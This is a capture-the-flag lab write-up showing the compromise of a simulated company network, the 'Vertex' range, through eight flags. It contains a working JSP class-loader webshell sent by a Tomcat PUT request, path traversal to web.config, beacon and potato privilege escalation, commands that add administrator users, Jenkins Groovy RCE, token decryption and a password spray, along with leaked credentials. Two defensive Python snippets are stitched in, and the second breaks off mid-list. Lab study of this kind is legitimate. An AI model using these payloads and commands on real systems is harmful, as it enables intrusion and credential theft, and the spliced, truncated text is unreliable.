Vertex
In this range you play a penetration tester hired to assess the network security of VertexSoft Technology Co., Ltd. VertexSoft is a leading company in the internet and information technology field, committed to delivering outstanding digital solutions for a wide range of business needs. Your task is first to compromise the company's internet-facing applications, then to use post-exploitation techniques to move deep into VertexSoft's internal network. Along the way you will look for weaknesses and vulnerabilities and take over every service one by one. The final goal is to take over the domain controller and thereby control the entire internal network. The range contains 8 flags spread across different hosts; finding and capturing them is your objective.
1. flag01
1.1. Information gathering
┌──(root㉿kali)-[~/Desktop/ChunQiu/Vertex]
└─# fscan -h 8.130.151.6
┌──────────────────────────────────────────────┐
│ ___ _ │
│ / _ \ ___ ___ _ __ __ _ ___| | __ │
│ / /_\/____/ __|/ __| '__/ _` |/ __| |/ / │
│ / /_\\_____\__ \ (__| | | (_| | (__| < │
│ \____/ |___/\___|_| \__,_|\___|_|\_\ │
└──────────────────────────────────────────────┘
Fscan Version: 2.0.1
[796ms] 已选择服务扫描模式
[796ms] 开始信息扫描
[796ms] 最终有效主机数量: 1
[796ms] 开始主机扫描
[796ms] 使用服务插件: activemq, cassandra, elasticsearch, findnet, ftp, imap, kafka, ldap, memcached, modbus, mongodb,
ms17010, mssql, mysql, neo4j, netbios, oracle, pop3, postgres, rabbitmq, rdp, redis, rsync, smb, smb2, smbghost, smtp, snmp, ssh, telnet, vnc, webpoc, webtitle
[796ms] 有效端口数量: 233
[846ms] [*] 端口开放 8.130.146.255:80
[894ms] [*] 端口开放 8.130.146.255:135
[894ms] [*] 端口开放 8.130.146.255:1433
[897ms] [*] 端口开放 8.130.146.255:139
[902ms] [*] 端口开放 8.130.146.255:8172
[921ms] [*] 端口开放 8.130.146.255:8000
[3.8s] 扫描完成, 发现 6 个开放端口
[3.8s] 存活端口数量: 6
[3.8s] 开始漏洞扫描
[3.9s] POC加载完成: 总共387个,成功387个,失败0个
[3.9s] [*] 网站标题 http://8.130.146.255 状态码:200 长度:43679 标题:VertexSoft
[4.0s] [*] NetInfo 扫描结果
目标主机: 8.130.146.255
主机名: WIN-IISSERER
发现的网络接口:
IPv4地址:
└─ 192.168.8.9
[4.3s] [*] 网站标题 http://8.130.146.255:8000 状态码:200 长度:4018 标题:Modbus Monitor - VertexSoft Internal Attendance System
[5.4s] [*] 网站标题 https://8.130.146.255:8172 状态码:404 长度:0 标题:无标题
[30.4s] 扫描已完成: 9/9
┌──(root㉿kali)-[~/Desktop/ChunQiu/Vertex]
└─# fscan -h 39.101.67.71
┌──────────────────────────────────────────────┐
│ ___ _ │
│ / _ \ ___ ___ _ __ __ _ ___| | __ │
│ / /_\/____/ __|/ __| '__/ _` |/ __| |/ / │
│ / /_\\_____\__ \ (__| | | (_| | (__| < │
│ \____/ |___/\___|_| \__,_|\___|_|\_\ │
└──────────────────────────────────────────────┘
Fscan Version: 2.0.1
[890ms] 已选择服务扫描模式
[890ms] 开始信息扫描
[890ms] 最终有效主机数量: 1
[890ms] 开始主机扫描
[890ms] 使用服务插件: activemq, cassandra, elasticsearch, findnet, ftp, imap, kafka, ldap, memcached, modbus, mongodb,
ms17010, mssql, mysql, neo4j, netbios, oracle, pop3, postgres, rabbitmq, rdp, redis, rsync, smb, smb2, smbghost, smtp, snmp, ssh, telnet, vnc, webpoc, webtitle
[890ms] 有效端口数量: 233
[950ms] [*] 端口开放 39.101.67.71:22
[987ms] [*] 端口开放 39.101.67.71:8080
[3.9s] 扫描完成, 发现 2 个开放端口
[3.9s] 存活端口数量: 2
[3.9s] 开始漏洞扫描
[3.9s] POC加载完成: 总共387个,成功387个,失败0个
[4.6s] [*] 网站标题 http://39.101.67.71:8080 状态码:302 长度:0 标题:无标题 重定向地址: http://39.101.67.71:8080/login;jsessionid=8E2C1E43DFD93FFBF6972DDE810F3C3A
[5.0s] [*] 网站标题 http://39.101.67.71:8080/login;jsessionid=8E2C1E43DFD93FFBF6972DDE810F3C3A 状态码:200 长度:1383 标题:Master ERP login Form
[10.1s] [+] 目标: http://39.101.67.71:8080
漏洞类型: poc-yaml-springboot-env-unauth
漏洞名称: spring2
详细信息:
参考链接:https://github.com/LandGrey/SpringBootVulExploit
[46.4s] 扫描已完成: 3/3
IP: 39.101.67.71
Port: 22, service: SSH
Port: 8080, service: HTTP (application: Master ERP)
Vulnerability: unauthenticated Spring Boot env access
1.2. Unauthenticated Spring Boot heapdump
┌──(root㉿kali)-[~/Desktop/ChunQiu/Vertex]
└─# dirsearch -u http://39.101.67.71:8080 -x 403,404
_|. _ _ _ _ _ _|_ v0.4.3
(_||| _) (/_(_|| (_| )
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460
Output File: /root/Desktop/ChunQiu/Vertex/reports/http_39.101.67.71_8080/_26-01-22_06-17-58.txt
Target: http://39.101.67.71:8080/
[06:17:58] Starting:
[06:18:02] 400 - 435B - /\..\..\..\..\..\..\..\..\..\etc\passwd
[06:18:03] 400 - 435B - /a%5c.aspx
[06:18:03] 200 - 2KB - /actuator
[06:18:03] 200 - 20B - /actuator/caches
[06:18:03] 200 - 6KB - /actuator/env
[06:18:03] 200 - 167B - /actuator/health
[06:18:04] 200 - 91KB - /actuator/beans
[06:18:04] 200 - 99KB - /actuator/conditions
[06:18:04] 200 - 2B - /actuator/info
[06:18:04] 200 - 54B - /actuator/scheduledtasks
[06:18:04] 200 - 1018B - /actuator/metrics
[06:18:04] 200 - 22KB - /actuator/mappings
[06:18:04] 200 - 14KB - /actuator/configprops
[06:18:04] 200 - 50KB - /actuator/loggers
[06:18:04] 200 - 71KB - /actuator/threaddump
[06:18:04] 200 - 33MB - /actuator/heapdump
[06:18:18] 200 - 1KB - /login
[06:18:18] 200 - 1KB - /login/
Task Completed
1.3. shiro
┌──(root㉿kali)-[~/Desktop/ChunQiu/Vertex]
└─# JDumpSpider-1.1-SNAPSHOT-full.jar heapdump
===========================================
CookieRememberMeManager(ShiroKey)
-------------
algMode = GCM, key = Hl5LLC0EpW3KCUJrbe/FIQ==, algName = AES
/ >cat flag.txt
████████ ███████ ███████
░██░░░░░ ░██░░░░██ ░██░░░░██
░██ ░██ ░██ ░██ ░██
░███████ ░███████ ░███████
░██░░░░ ░██░░░██ ░██░░░░
░██ ░██ ░░██ ░██
░████████░██ ░░██░██
░░░░░░░░ ░░ ░░ ░░
flag{98e9c5e5-eb81-477a-8704-c81a116a6ef7}
2. flag02
IP: 8.145.32.249
Hostname: WIN-IISSERER (internal IP: 192.168.8.9)
Port: 80, service: HTTP (title: VertexSoft)
Port: 135, service: RPC
Port: 139, service: NetBIOS
Port: 1433, service: MSSQL
Port: 8000, service: HTTP (title: Modbus Monitor - VertexSoft Internal Attendance System)
Port: 8172, service: HTTPS
2.1. Information gathering
Port 80 is a static website.
Port 8000 is an attendance system.
The registration request can be intercepted and the new user's role changed.
The export list reveals the administrator's password A1m!n@Qsx1Jn.
2.2. Arbitrary file download
Looking at the download URL, it looks like arbitrary files can be downloaded:
http://8.145.32.249:8000/User/DownloadFile?download=Export&fileName=users.csv
Since the target is an ASP.NET site, try downloading web.config:
http://8.145.32.249:8000/User/DownloadFile?download=Export&fileName=../web.Config
IIS does not allow .config files to be downloaded, but the restriction can be bypassed by changing the case.
The MSSQL credentials can be obtained from web.config:
<connectionStrings>
<add
name="UserModel"
connectionString="data source=127.0.0.1;initial catalog=GuestDB;persist security info=True;user id=sa;password=Sa1pYbSM!dsQ;MultipleActiveResultSets=True;App=EntityFramework"
providerName="System.Data.SqlClient"
/>
</connectionStrings>
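The DownloadFile handler above trusts a caller-supplied fileName, and the page shows the .config restriction being bypassed with a case change, which is the weakness of any case-sensitive extension block-list. The check below is an added example (not the attendance application's code) of how such a handler should resolve the request: only a bare file name, an allow-listed extension compared case-insensitively, and the resolved path confined to the export directory. EXPORT_DIR and the extension list are assumptions.

```python
from pathlib import Path, PurePosixPath
from typing import Optional

# Constructed example: the directory the export handler is allowed to serve from,
# and the only extensions an attendance export should ever have.
EXPORT_DIR = Path("/srv/attendance/exports")
ALLOWED_EXTENSIONS = {".csv", ".xlsx"}


def resolve_download(base_dir: Path, file_name: str) -> Optional[Path]:
    """Return the file to serve, or None if the request must be rejected.

    Rejects empty names, embedded NULs, absolute paths, any directory
    component (so '../' and '..\\' traversal never reach the filesystem),
    and any extension not on the allow-list. The extension check lowercases
    the suffix first, so 'web.Config' and 'web.CONFIG' are treated exactly
    like 'web.config' instead of slipping past a case-sensitive block-list.
    """
    if not file_name or "\x00" in file_name:
        return None
    # A Windows client (or IIS itself) may send backslashes; normalise first.
    name = file_name.replace("\\", "/")
    # Only a bare file name is accepted: no directories, no '.' or '..'.
    if PurePosixPath(name).name != name or name in (".", ".."):
        return None
    if PurePosixPath(name).suffix.lower() not in ALLOWED_EXTENSIONS:
        return None
    base = base_dir.resolve()
    candidate = (base / name).resolve()
    # Defence in depth: after symlink resolution the file must still sit
    # directly inside the export directory.
    if candidate.parent != base:
        return None
    return candidate
```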
2.3. mssql
We have dba privileges right away.
The target has no outbound internet access.
Upload an AV-evading shell and bring it online,
then upload an AV-evading potato and create an administrator user:
beacon> shell C:\Users\Public\sp.exe -a "net localgroup administrators c1trus /add"
beacon> shell C:\Users\Public\sp.exe -a "net user c1trus Admin123 /add "
After getting in, Defender was turned off.
flag{0079eeec-664d-4ee4-8099-b8907ee7a51f}
3. Internal network proxy
3.1. Windows entry host
C:\Users\c1trus\Desktop>fscan -h 192.168.8.9/24
┌──────────────────────────────────────────────┐
│ ___ _ │
│ / _ \ ___ ___ _ __ __ _ ___| | __ │
│ / /_\/____/ __|/ __| '__/ _` |/ __| |/ / │
│ / /_\\_____\__ \ (__| | | (_| | (__| < │
│ \____/ |___/\___|_| \__,_|\___|_|\_\ │
└──────────────────────────────────────────────┘
Fscan Version: 2.0.1
[2.5s] 已选择服务扫描模式
[2.5s] 开始信息扫描
[2.5s] CIDR范围: 192.168.8.0-192.168.8.255
[2.5s] generate_ip_range_full
[2.5s] 解析CIDR 192.168.8.9/24 -> IP范围 192.168.8.0-192.168.8.255
[2.5s] 最终有效主机数量: 256
[2.5s] 开始主机扫描
[2.5s] 使用服务插件: activemq, cassandra, elasticsearch, findnet, ftp, imap, kafka, ldap, memcached, modbus, mongodb, ms17010, mssql, mysql, neo4j, netbios, oracle, pop3, postgres, rabbitmq, rdp, redis, rsync, smb, smb2, smbghost, smtp, snmp, ssh, telnet, vnc, webpoc, webtitle
[2.6s] [*] 目标 192.168.8.12 存活 (ICMP)
[2.6s] [*] 目标 192.168.8.146 存活 (ICMP)
[2.6s] [*] 目标 192.168.8.16 存活 (ICMP)
[2.6s] [*] 目标 192.168.8.253 存活 (ICMP)
[2.7s] [*] 目标 192.168.8.26 存活 (ICMP)
[2.7s] [*] 目标 192.168.8.38 存活 (ICMP)
[2.7s] [*] 目标 192.168.8.42 存活 (ICMP)
[2.7s] [*] 目标 192.168.8.9 存活 (ICMP)
[5.6s] 存活主机数量: 8
[5.6s] 有效端口数量: 233
[5.6s] [*] 端口开放 192.168.8.12:88
[5.6s] [*] 端口开放 192.168.8.12:139
[5.6s] [*] 端口开放 192.168.8.12:135
[5.6s] [*] 端口开放 192.168.8.16:445
[5.6s] [*] 端口开放 192.168.8.16:135
[5.6s] [*] 端口开放 192.168.8.16:139
[5.6s] [*] 端口开放 192.168.8.146:22
[5.6s] [*] 端口开放 192.168.8.16:8080
[5.6s] [*] 端口开放 192.168.8.146:8080
[5.6s] [*] 端口开放 192.168.8.12:445
[5.6s] [*] 端口开放 192.168.8.12:389
[7.7s] [*] 端口开放 192.168.8.26:445
[7.7s] [*] 端口开放 192.168.8.26:139
[7.7s] [*] 端口开放 192.168.8.26:135
[8.2s] [*] 端口开放 192.168.8.26:8080
[8.6s] [*] 端口开放 192.168.8.38:445
[8.6s] [*] 端口开放 192.168.8.38:139
[8.6s] [*] 端口开放 192.168.8.38:135
[9.7s] [*] 端口开放 192.168.8.38:3306
[17.0s] [*] 端口开放 192.168.8.42:8060
[17.0s] [*] 端口开放 192.168.8.42:80
[17.0s] [*] 端口开放 192.168.8.42:22
[17.0s] [*] 端口开放 192.168.8.9:8000
[17.0s] [*] 端口开放 192.168.8.9:1433
[17.0s] [*] 端口开放 192.168.8.9:445
[17.0s] [*] 端口开放 192.168.8.9:139
[17.0s] [*] 端口开放 192.168.8.9:135
[17.0s] [*] 端口开放 192.168.8.9:80
[17.0s] [*] 端口开放 192.168.8.42:9094
[17.0s] [*] 端口开放 192.168.8.9:8172
[17.0s] 扫描完成, 发现 30 个开放端口
[17.0s] 存活端口数量: 30
[17.0s] 开始漏洞扫描
[17.1s] POC加载完成: 总共387个,成功387个,失败0个
[17.2s] [*] NetInfo 扫描结果
目标主机: 192.168.8.9
主机名: WIN-IISSERER
发现的网络接口:
IPv4地址:
└─ 192.168.8.9
[17.2s] [*] NetInfo 扫描结果
目标主机: 192.168.8.38
主机名: WIN-OPS88
发现的网络接口:
IPv4地址:
└─ 192.168.8.38
[17.2s] [*] NetInfo 扫描结果
目标主机: 192.168.8.16
主机名: WIN-SERVER03
发现的网络接口:
IPv4地址:
└─ 192.168.8.16
[17.2s] [*] NetInfo 扫描结果
目标主机: 192.168.8.26
主机名: WIN-PC3788
发现的网络接口:
IPv4地址:
└─ 192.168.8.26
[17.3s] [*] NetInfo 扫描结果
目标主机: 192.168.8.12
主机名: RODC
发现的网络接口:
IPv4地址:
└─ 192.168.8.12
[17.4s] [+] NetBios 192.168.8.16 WORKGROUP\WIN-SERVER03
[17.5s] [+] NetBios 192.168.8.12 DC:VERTEXSOFT\RODC
[17.5s] [*] 网站标题 http://192.168.8.9 状态码:200 长度:43679 标题:VertexSoft
[17.6s] [+] NetBios 192.168.8.38 WORKGROUP\WIN-OPS88
[17.6s] [+] NetBios 192.168.8.26 WORKGROUP\WIN-PC3788
[17.6s] [*] 网站标题 http://192.168.8.42 状态码:302 长度:99 标题:无标题 重定向地址: http://192.168.8.42/users/sign_in
[17.6s] [*] 网站标题 http://192.168.8.146:8080 状态码:302 长度:0 标题:无标题 重定向地址: http://192.168.8.146:8080/login;jsessionid=275366D7600AEA498B492BA73F6711EA
[17.6s] [*] 网站标题 http://192.168.8.42:8060 状态码:404 长度:555 标题:404 Not Found
[17.6s] [*] 网站标题 https://192.168.8.9:8172 状态码:404 长度:0 标题:无标题
[18.0s] [*] 网站标题 http://192.168.8.26:8080 状态码:200 长度:147 标题:第一个 JSP 程序
[18.2s] [*] 网站标题 http://192.168.8.146:8080/login;jsessionid=275366D7600AEA498B492BA73F6711EA 状态码:200 长度:1383 标题:Master ERP login Form
[19.3s] [*] 网站标题 http://192.168.8.16:8080 状态码:403 长度:594 标题:无标题
[19.5s] [*] 网站标题 http://192.168.8.42/users/sign_in 状态码:200 长度:11166 标题:登录 · GitLab
[22.0s] [+] MySQL 192.168.8.38:3306 root 123456
[22.3s] [*] 网站标题 http://192.168.8.9:8000 状态码:200 长度:4018 标题:Modbus Monitor - VertexSoft Internal Attendance System
[23.7s] [+] 目标: http://192.168.8.146:8080
漏洞类型: poc-yaml-springboot-env-unauth
漏洞名称: spring2
详细信息:
参考链接:https://github.com/LandGrey/SpringBootVulExploit
IP: 192.168.8.9 (entry host)
Port: 80, service: HTTP (site: VertexSoft)
Port: 445, service: SMB
Port: 139, service: NetBIOS
Port: 135, service: RPC
Port: 1433, service: MSSQL
Port: 8000, service: HTTP (Modbus Monitor - VertexSoft Internal Attendance System)
Port: 8172, service: HTTPS
IP: 192.168.8.12
Hostname: RODC
Role: domain controller (DC)
Port: 88, service: Kerberos
Port: 389, service: LDAP
Port: 445, service: SMB
Port: 139, service: NetBIOS
Port: 135, service: RPC
IP: 192.168.8.16
Hostname: WIN-SERVER03
Port: 445, service: SMB
Port: 139, service: NetBIOS
Port: 135, service: RPC
Port: 8080, service: HTTP
IP: 192.168.8.26
Hostname: WIN-PC3788
Port: 445, service: SMB
Port: 139, service: NetBIOS
Port: 135, service: RPC
Port: 8080, service: HTTP
IP: 192.168.8.38
Hostname: WIN-OPS88
Port: 445, service: SMB
Port: 139, service: NetBIOS
Port: 135, service: RPC
Port: 3306, service: MySQL root 123456
IP: 192.168.8.42
Port: 22, service: SSH
Port: 80, service: HTTP
Port: 8060, service: HTTP
Port: 9094, service: unknown
Application: GitLab
URL: http://192.168.8.42/users/sign_in
IP: 192.168.8.146 (entry host)
Port: 22, service: SSH
Port: 8080, service: HTTP (application: Master ERP)
Vulnerability: unauthenticated Spring Boot env access
C:\Users\c1trus\Desktop>agent.exe -bind 0.0.0.0:5555 -ignore-cert
┌──(root㉿kali)-[~/Desktop/ChunQiu/Vertex]
└─# ligolo-proxy -selfcert
WARN[0000] Using default selfcert domain 'ligolo', beware of CTI, SOC and IoC!
WARN[0000] Using self-signed certificates
ERRO[0000] Certificate cache error: acme/autocert: certificate cache miss, returning a new certificate
WARN[0000] TLS Certificate fingerprint for ligolo is: 077B13423C087EC4498E36E925B82784969E4612FBEE3969DC6385FDEBDA31B5
INFO[0000] Listening on 0.0.0.0:11601
__ _ __
/ / (_)___ _____ / /___ ____ ____ _
/ / / / __ `/ __ \/ / __ \______/ __ \/ __ `/
/ /___/ / /_/ / /_/ / / /_/ /_____/ / / / /_/ /
/_____/_/\__, /\____/_/\____/ /_/ /_/\__, /
/____/ /____/
Made in France ♥ by @Nicocha30!
Version: dev
ligolo-ng » connect_agent --ip 8.145.32.249:5555
? TLS Certificate Fingerprint is: 09DCC2BC11F6EF6F288E04162C3D70090BF7EA0D6E95DF7B4750F54C5345175B, connect? Yes
INFO[0023] Agent connected. id=00163e01a629 name="WIN-IISSERER\\c1trus@WIN-IISSERER" remote="8.145.32.249:5555"
ligolo-ng »
4. flag03 192.168.8.26
4.1. CVE-2017-12615 Tomcat PUT file upload
┌──(root㉿kali)-[~/Desktop/ChunQiu/Vertex]
└─# dirsearch -u http://192.168.8.26:8080/ -x 403,404
_|. _ _ _ _ _ _|_ v0.4.3
(_||| _) (/_(_|| (_| )
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460
Output File: /root/Desktop/ChunQiu/Vertex/reports/http_192.168.8.26_8080/__26-01-22_08-11-08.txt
Target: http://192.168.8.26:8080/
[08:11:08] Starting:
[08:11:15] 400 - 795B - /\..\..\..\..\..\..\..\..\..\etc\passwd
[08:11:16] 400 - 795B - /a%5c.aspx
[08:11:22] 302 - 0B - /backup -> /backup/
[08:11:22] 200 - 138B - /backup/
Task Completed
The writeup says it is this vulnerability but does not say how to tell, and I could not tell either.
Following it, upload a webshell:
PUT /backup/upload/sim.jsp HTTP/1.1
Host: 192.168.8.26:8080
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Cookie: JSESSIONID=A377FCF0DA5A1767C46C7478027926F9; JSESSIONID=0F908F3AE0576C6145257C8E9395272C
Connection: close
Content-Length: 956
<%!
class U extends ClassLoader {
U(ClassLoader c) {
super(c);
}
public Class g(byte[] b) {
return super.defineClass(b, 0, b.length);
}
}
public byte[] base64Decode(String str) throws Exception {
try {
Class clazz = Class.forName("sun.misc.BASE64Decoder");
return (byte[]) clazz.getMethod("decodeBuffer", String.class).invoke(clazz.newInstance(), str);
} catch (Exception e) {
Class clazz = Class.forName("java.util.Base64");
Object decoder = clazz.getMethod("getDecoder").invoke(null);
return (byte[]) decoder.getClass().getMethod("decode", String.class).invoke(decoder, str);
}
}
%>
<%
String cls = request.getParameter("passwd");
if (cls != null) {
new U(this.getClass().getClassLoader()).g(base64Decode(cls)).newInstance().equals(pageContext);
}
%>
4.2. Beacon and potato privilege escalation
The target has no AV.
Just upload a beacon and bring it online.
C:\apache-tomcat-8.5.71> whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token Disabled
SeIncreaseQuotaPrivilege Adjust memory quotas for a process Disabled
SeSystemtimePrivilege Change the system time Disabled
SeAuditPrivilege Generate security audits Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege Create global objects Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
SeTimeZonePrivilege Change the time zone Disabled
Use DeadPotato to get a SYSTEM beacon.
[01/22 21:37:45] beacon> shell type C:\Users\Administrator\flag\flag.txt
[01/22 21:37:46] [*] Tasked beacon to run: type C:\Users\Administrator\flag\flag.txt
[01/22 21:37:46] [+] host called home, sent: 72 bytes
[01/22 21:37:52] [+] received output:
W W III N N PPPP CCC 333 77777 888 888
W W I NN N P P C 3 7 8 8 8 8
W W W I N N N --- PPPP C 33 7 888 888
W W W I N NN P C 3 7 8 8 8 8
W W III N N P CCC 333 7 888 888
flag{c37b368f-8585-47d7-adf2-0c04c8ef30a3}
5. flag04 192.168.8.16
IP: 192.168.8.16
Hostname: WIN-SERVER03
Port: 445, service: SMB
Port: 139, service: NetBIOS
Port: 135, service: RPC
Port: 8080, service: HTTP
5.1. Jenkins weak password
Weak password admin / admin123, then RCE from the Jenkins back end.
But since we are already SYSTEM, just create a local administrator and RDP in:
println "net user c2trus Admin123 /add".execute().text
println "net localgroup administrators c2trus /add".execute().text
_ ____ ____ ____ ____ _ __
/ | ____ |__ ||_ _|| ||__ || | \
| |__ |____| _/ / / \ ||_| | _/ / | || |
\___| |____||_/\_||_||_||____|\__|_|
flag{8bef2d26-91a8-481d-a883-cfd3b0e2ce5a}
6. flag05 192.168.8.42
IP: 192.168.8.42
Port: 22, service: SSH
Port: 80, service: HTTP
Port: 8060, service: HTTP
Port: 9094, service: unknown
Application: GitLab
URL: http://192.168.8.42/users/sign_in
6.1. gitlab
The GitLab API token can be obtained from Jenkins's credentials.xml:
<?xml version='1.1' encoding='UTF-8'?>
<com.cloudbees.plugins.credentials.SystemCredentialsProvider plugin="credentials@1361.v56f5ca_35d21c">
<domainCredentialsMap class="hudson.util.CopyOnWriteMap$Hash">
<entry>
<com.cloudbees.plugins.credentials.domains.Domain>
<specifications/>
</com.cloudbees.plugins.credentials.domains.Domain>
<java.util.concurrent.CopyOnWriteArrayList>
<com.dabsquared.gitlabjenkins.connection.GitLabApiTokenImpl plugin="gitlab-plugin@1.8.1">
<scope>GLOBAL</scope>
<id>84bc6224-fa06-489e-b746-f5dedb11a235</id>
<description></description>
<apiToken>{AQAAABAAAAAgqoi+w8f2N/rXi0qZEha5nGPamO0CIjokzT/a64spCEBqrIv7dFOC/dVxZwp+6CCU}</apiToken>
</com.dabsquared.gitlabjenkins.connection.GitLabApiTokenImpl>
</java.util.concurrent.CopyOnWriteArrayList>
</entry>
</domainCredentialsMap>
</com.cloudbees.plugins.credentials.SystemCredentialsProvider>
Decrypt it as described in the usual Jenkins credential decryption references:
┌──(root㉿kali)-[~/Desktop/ChunQiu/Vertex]
└─# jenkins-credentials-decryptor -m master.key -s hudson.util.Secret -c credentials.xml
[
{
"apiToken": "glpat-2Z7YFA6k57s93VHMvHxh",
"id": "84bc6224-fa06-489e-b746-f5dedb11a235",
"scope": "GLOBAL"
}
]
┌──(root㉿kali)-[~/Desktop/ChunQiu/Vertex/CodeSentinel]
└─# curl --header "PRIVATE-TOKEN:glpat-2Z7YFA6k57s93VHMvHxh" "http://192.168.8.42/api/v4/projects"| jq '.[].name'
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 21051 100 21051 0 0 53354 0 --:--:-- --:--:-- --:--:-- 53428
"VertexSoftBackup"
"Hexo"
"VertexApp"
"ERP_Old"
"PortalCode"
There are five projects.
┌──(root㉿kali)-[~/Desktop/ChunQiu/Vertex/CodeSentinel]
└─# git clone http://192.168.8.42:glpat-2Z7YFA6k57s93VHMvHxh@192.168.8.42/vertexsoft/vertexsoftbackup.git
Cloning into 'vertexsoftbackup'...
remote: Enumerating objects: 6, done.
remote: Counting objects: 100% (3/3), done.
remote: Compressing objects: 100% (3/3), done.
remote: Total 6 (delta 0), reused 0 (delta 0), pack-reused 3
Receiving objects: 100% (6/6), done.
┌──(root㉿kali)-[~/…/ChunQiu/Vertex/CodeSentinel/vertexsoftbackup]
└─# ls
backup.txt README.md
┌──(root㉿kali)-[~/…/ChunQiu/Vertex/CodeSentinel/vertexsoftbackup]
└─# cat backup.txt
██████╗ ██╗████████╗██╗ █████╗ ██████╗
██╔════╝ ██║╚══██╔══╝██║ ██╔══██╗██╔══██╗
██║ ███╗██║ ██║ ██║ ███████║██████╔╝
██║ ██║██║ ██║ ██║ ██╔══██║██╔══██╗
╚██████╔╝██║ ██║ ███████╗██║ ██║██████╔╝
╚═════╝ ╚═╝ ╚═╝ ╚══════╝╚═╝ ╚═╝╚═════╝
flag{7bc76381-d76e-45af-99d6-9ac19baabf53}
7. flag06 192.168.8.38
IP: 192.168.8.38
Hostname: WIN-OPS88
Port: 445, service: SMB
Port: 139, service: NetBIOS
Port: 135, service: RPC
Port: 3306, service: MySQL
Weak password: MySQL root / 123456
7.1. MySQL weak password
Just create an administrator user and go all in.
This machine is painfully slow: connecting to the database took forever, and so did the RDP login.
db d8b db d888888b d8b db .d88b. d8888b. .d8888. .d888b. .d888b.
88 I8I 88 `88' 888o 88 .8P Y8. 88 `8D 88' YP 88 8D 88 8D
88 I8I 88 88 88V8o 88 88 88 88oodD' `8bo. `VoooY' `VoooY'
Y8 I8I 88 88 88 V8o88 C8888D 88 88 88~~~ `Y8b. .d~~~b. .d~~~b.
`8b d8'8b d8' .88. 88 V888 `8b d8' 88 db 8D 88 8D 88 8D
`8b8' `8d8' Y888888P VP V8P `Y88P' 88 `8888Y' `Y888P' `Y888P'
flag{0d9d3afa-8c5c-43ca-8799-6b84355823c5}
┌──(root㉿kali)-[~/Desktop/ChunQiu/Vertex]
└─# ping 192.168.8.38
PING 192.168.8.38 (192.168.8.38) 56(84) bytes of data.
64 bytes from 192.168.8.38: icmp_seq=1 ttl=64 time=110 ms
64 bytes from 192.168.8.38: icmp_seq=2 ttl=64 time=110 ms
64 bytes from 192.168.8.38: icmp_seq=3 ttl=64 time=111 ms
^C
--- 192.168.8.38 ping statistics ---
3 packets transmitted, 3 received, 0% packet loss, time 2001ms
rtt min/avg/max/mdev = 110.278/110.470/110.810/0.240 ms
The latency is not even high, yet it lags terribly.
8. flag07 192.168.8.12
IP: 192.168.8.12
Hostname: RODC
Role: domain controller (DC)
Port: 88, service: Kerberos
Port: 389, service: LDAP
Port: 445, service: SMB
Port: 139, service: NetBIOS
Port: 135, service: RPC
In c:\users\administrator\documents\ on the MySQL machine 192.168.8.38 there is a password list, ROAdmins.xlsx.
8.1. Password spraying
Username Password
IsabellaTech Nt5w0V4?Ff
LucasEther ur4aLwo!bB
NathanZen rXjfpYRn?Q
VictoriaVoid 4cd0?8euR6
SamuelStorm UzVXrDJ@B6
OliviaVoid Usq0gV!D52
MargaretStorm GbK3p!rDJE
CharlieCloud u!6vDaGQOA
All of them are valid; the passwords have just expired.
┌──(root㉿kali)-[~/Desktop/ChunQiu/Vertex]
└─# nxc smb 192.168.8.12 -u user.txt -p pass.txt --no-bruteforce --continue-on-success
SMB 192.168.8.12 445 RODC [*] Windows Server 2022 Build 20348 x64 (name:RODC) (domain:vertexsoft.local) (signing:True) (SMBv1:None) (Null Auth:True)
SMB 192.168.8.12 445 RODC [-] vertexsoft.local\IsabellaTech:Nt5w0V4?Ff STATUS_PASSWORD_EXPIRED
SMB 192.168.8.12 445 RODC [-] vertexsoft.local\LucasEther:ur4aLwo!bB STATUS_PASSWORD_EXPIRED
SMB 192.168.8.12 445 RODC [-] vertexsoft.local\NathanZen:rXjfpYRn?Q STATUS_PASSWORD_EXPIRED
SMB 192.168.8.12 445 RODC [-] vertexsoft.local\VictoriaVoid:4cd0?8euR6 STATUS_PASSWORD_EXPIRED
SMB 192.168.8.12 445 RODC [-] vertexsoft.local\SamuelStorm:UzVXrDJ@B6 STATUS_PASSWORD_EXPIRED
SMB 192.168.8.12 445 RODC [-] vertexsoft.local\OliviaVoid:Usq0gV!D52 STATUS_PASSWORD_EXPIRED
SMB 192.168.8.12 445 RODC [-] vertexsoft.local\MargaretStorm:GbK3p!rDJE STATUS_PASSWORD_EXPIRED
SMB 192.168.8.12 445 RODC [-] vertexsoft.local\CharlieCloud:u!6vDaGQOA STATUS_PASSWORD_EXPIRED
SMB 192.168.8.12 445 RODC [+] vertexsoft.local\:
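From the DC's side the spray above is eight different accounts failing from one source within seconds, and every failure carries STATUS_PASSWORD_EXPIRED, which the DC only returns after the password was verified as correct. The detection below is an added example (not from the page or any tool it uses) that runs that logic over constructed Security event 4625 records; the sample events, the source address and the window and threshold defaults are assumptions.

```python
from collections import defaultdict
from datetime import datetime, timedelta
from typing import Dict, List

# NTSTATUS values a DC returns in the SubStatus field of Security event 4625.
# 0xC0000071 matters most for spray triage: "password expired" is only reported
# after the supplied password was checked and found correct.
SUBSTATUS = {
    "0xC000006A": "wrong password",
    "0xC0000064": "no such user",
    "0xC0000071": "password expired (password was correct)",
    "0xC0000234": "account locked out",
}

# Constructed sample: 4625 events as a SIEM would expose them (UTC timestamps).
# The first eight mirror the spray on the page: eight accounts, one source, seconds apart.
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {"time": "2026-01-22T15:10:01", "ip": "192.168.8.9", "user": "IsabellaTech", "substatus": "0xC0000071"},
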